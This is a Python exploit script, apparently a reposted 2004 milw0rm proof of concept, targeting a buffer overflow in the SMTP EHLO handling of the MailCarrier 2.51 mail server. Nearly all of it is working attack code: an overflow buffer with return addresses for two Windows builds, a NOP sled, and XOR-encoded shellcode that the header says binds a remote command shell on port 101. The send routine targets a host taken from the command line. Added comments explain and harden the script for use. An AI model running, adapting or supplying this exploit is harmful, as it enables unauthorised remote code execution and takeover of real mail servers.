#########################################################
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow #
# Vendor tagline: "Advanced, secure and easy to use" mail server; its SMTP service (TCP/25) is the target. #
# 23 Oct 2004 - muts #
#########################################################
# D:\BO>mailcarrier-2.5-EHLO.py #
#########################################################
# D:\datatools>nc -v 192.168.1.32 101 #
# localhost [127.0.0.1] 101 (hostname) open #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-2000 Microsoft Corp. #
# C:\WINNT\system32> #
#########################################################
import socket
import struct
import sys
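# Banner.  The escapes were lost in transcription ("nn###" was "\n\n###");
# print() with a single string argument behaves the same under Python 2
# and 3, so the script no longer depends on the print statement.
print("\n\n###############################################")
print("\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow")
print("\nFound & coded by muts [at] whitehat.co.il")
print("\nFor Educational Purposes Only!\n")
print("\n\n###############################################")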
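def make_overflow_dummy(overflow_len, retaddr):
    """Build the overflow prefix: ``overflow_len`` filler bytes followed by
    a 32-bit little-endian return address.

    Args:
        overflow_len: number of 0x41 ('A') filler bytes written before the
            saved return address is reached.  Target-build specific (the
            two values the author recorded differ by four bytes between
            Windows 2000 SP4 and XP SP2).
        retaddr: address that overwrites the saved return pointer, packed
            with ``struct.pack('<L', ...)``.  Because the EHLO argument is
            read as an SMTP command line, an address containing 0x0A or
            0x0D (and, if the server copies it as a C string, 0x00) is
            likely to be truncated before it is reached -- neither address
            listed below contains such a byte.

    Returns:
        bytes: filler followed by the packed address (str on Python 2).

    Raises:
        ValueError: if ``overflow_len`` is negative (``'A' * -1`` would
            silently yield an empty filler and a wrong layout).
        struct.error: if ``retaddr`` does not fit an unsigned 32-bit int.
    """
    if overflow_len < 0:
        raise ValueError("overflow_len must be >= 0, got %r" % (overflow_len,))
    # b'A' keeps this a bytes value on Python 3 so it concatenates with
    # the packed address and the bytes shellcode; on Python 2 it is str.
    return b'A' * overflow_len + struct.pack('<L', retaddr)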
# TCP client socket for the SMTP session, created at import time (a
# module-level side effect); it is connected and used by the exploit
# code further down.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
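# Shellcode (sc2), stored as bytes so it concatenates with the packed
# return address on Python 3 as well as Python 2.  The "\x" escapes were
# stripped in transcription ("xEB" was "\xEB") and are restored here.
#
# The first 22 bytes are a self-decoding stub:
#   EB 0F          jmp  +0x0F          -> to the call below
#   58             pop  eax            ; eax = start of encoded payload
#   80 30 88       xor  byte [eax],0x88
#   40             inc  eax
#   81 38 68616  36B cmp  dword [eax],"hack"
#   75 F4          jne  loop
#   EB 05          jmp  +5             ; into the decoded payload
#   E8 EC FF FF FF call -0x14          ; pushes payload address, back to pop
# so everything after it is stored XOR 0x88 and decoded in place until the
# 4-byte "hack" terminator is reached; the buffer ends with the last
# encoded byte, "hack" and a trailing NOP.  Per the header transcript the
# decoded payload binds a command shell on TCP/101 -- not verifiable from
# the bytes here without disassembling the decoded payload.  No byte is
# 0x00, 0x0A or 0x0D, so nothing cuts the SMTP command line short.
sc2 = b"\xEB"
sc2 += b"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
sc2 += b"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
sc2 += b"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
sc2 += b"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
sc2 += b"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
sc2 += b"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
sc2 += b"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
sc2 += b"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
sc2 += b"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
sc2 += b"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
sc2 += b"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
sc2 += b"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
sc2 += b"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
sc2 += b"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
sc2 += b"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
sc2 += b"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
sc2 += b"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
sc2 += b"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
sc2 += b"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
sc2 += b"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
sc2 += b"\x58\x68\x61\x63\x6B\x90"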
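# Per-target tuning: (filler length, return address).  Both values are
# specific to one OS / service-pack / language build; the author recorded
# two.  Presumably the address redirects execution onto the stack just
# past the saved return (a jmp/call esp-style gadget), which is what the
# NOP sled that follows it is for -- verify against the target build.
TARGETS = {
    'win2000_sp4_eng': (5093, 0x7c2ee21b),   # RET Win2000 SP4 ENG
    'winxp_sp2_eng': (5097, 0x7d17dd13),     # RET WinXP SP2 ENG
}
# Change the target key (or add an entry) as need be.
_filler_len, _ret = TARGETS['winxp_sp2_eng']
# Filler + return address, a 32-byte NOP sled, then the shellcode.  The
# name shadows the Python 2 builtin `buffer`, but the send code below
# references it, so it is kept.
buffer = make_overflow_dummy(_filler_len, _ret) + b'\x90' * 32 + sc2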
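# Target SMTP endpoint.  Optional command-line overrides (host, port) keep
# the author's 127.0.0.1:25 default when absent; the header transcript
# collects the shell from a remote host, so a hard-coded loopback address
# is rarely what the operator wants.  A non-numeric port raises
# ValueError here, before any traffic is sent.
target_host = sys.argv[1] if len(sys.argv) > 1 else '127.0.0.1'
target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 25

# A crashed or hijacked server may never reply, so the recv() below must
# not block forever (socket.timeout is a socket.error subclass).
s.settimeout(15)
try:
    s.connect((target_host, target_port))
except socket.error as exc:
    # Narrowed from a bare except: only a failed TCP connect means "could
    # not connect"; any other error should surface as a traceback.
    print("Could not connect to SMTP! (%s:%d: %s)" % (target_host, target_port, exc))
    s.close()
else:
    print("\nSending evil buffer...")
    reply = b''
    try:
        # sendall() rather than send(): the buffer is over 5 KiB and a
        # single send() may write only part of it.  The over-long EHLO
        # argument is the trigger; CRLF terminates the SMTP command line.
        s.sendall(b'EHLO ' + buffer + b'\r\n')
        reply = s.recv(1024)
    except socket.error as exc:
        # A reset or timeout after connecting is consistent with the
        # service crashing or the shellcode taking over the thread.
        print("No SMTP reply after the buffer (%s)." % exc)
    finally:
        # Closed on every path (the original closed only on success).
        s.close()
    if reply:
        # A normal SMTP response means the process is still serving this
        # connection, which may indicate the offset / return address does
        # not match the target build.
        print("Server replied: %r" % (reply,))
    print("\nDone! Try connecting to port 101 on victim machine.")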
# milw0rm.com [2004-10-26]